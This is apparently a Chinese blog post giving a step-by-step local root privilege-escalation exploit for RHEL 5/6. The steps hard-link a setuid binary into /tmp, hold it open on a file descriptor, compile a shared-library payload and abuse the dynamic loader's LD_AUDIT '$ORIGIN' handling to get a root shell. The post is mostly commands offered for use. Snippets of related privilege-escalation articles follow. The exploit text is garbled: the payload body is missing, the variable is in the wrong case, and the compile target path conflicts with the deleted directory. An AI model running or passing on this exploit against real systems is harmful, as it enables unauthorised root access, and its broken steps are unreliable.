RHEL6普通使用者提權到root

2021-09-10 09:16:07 字數 594 閱讀 7459

需要首先有個普通使用者的shell

實驗環境:rhel6.8

應該只針對rhel 5/6,別的版本沒試

如下都是在普通使用者下執行的,例如oracle使用者

mkdir /tmp/exploit

ln /bin/ping /tmp/exploit/target

exec 3< /tmp/exploit/target

rm -rf /tmp/exploit

void __attribute__((constructor)) init()

gcc -w -fpic -shared -o /tmp/exploit /tmp/payload.c
使用gcc編譯

使用當前的普通使用者執行如下,會報錯,然後你就會發現shell變成了root

ld_audit="\$origin" exec /proc/self/fd/3
注意最後需要在命令列中手動去執行ld_audit="\$origin" exec /proc/self/fd/3,否則不會進入root#

RHEL5 6普通使用者提權

1 2 root ns whoami 我是誰 root 1 2 3 4 root ns useradd putong root ns su putong putong ns whoami putong 1 2 3 4 5 6 7 8 9 10 11 12 putong ns ll d tmp drw...

提權學習 Linux普通使用者提權為root

當你的才華 還撐不起你的野心時 那你就應該靜下心來學習 目錄 linux普通使用者提權為root 接下來直接看例項 我記得我以前用linux的時候,忘記root密碼是常有的事情,很多時候大家都會選擇重啟系統,進入單使用者模式重置root密碼,但在實際運維工作中,就未必能任性重啟了。分享乙個不必重啟也...

Linux學習之如何讓普通使用者獲得ROOT許可權

sudo l 檢視當前使用者可使用的命令,僅限root使用者可用。sudo為系統管理員提供配置檔案,允許系統管理員集中地管理使用者的使用許可權和使用的主機,它預設的存放位置是 etc sudoers。1 檢視並修改sudoers的檔案許可權 我發現sudoers是乙個唯讀檔案,若要修改,必須修改許可...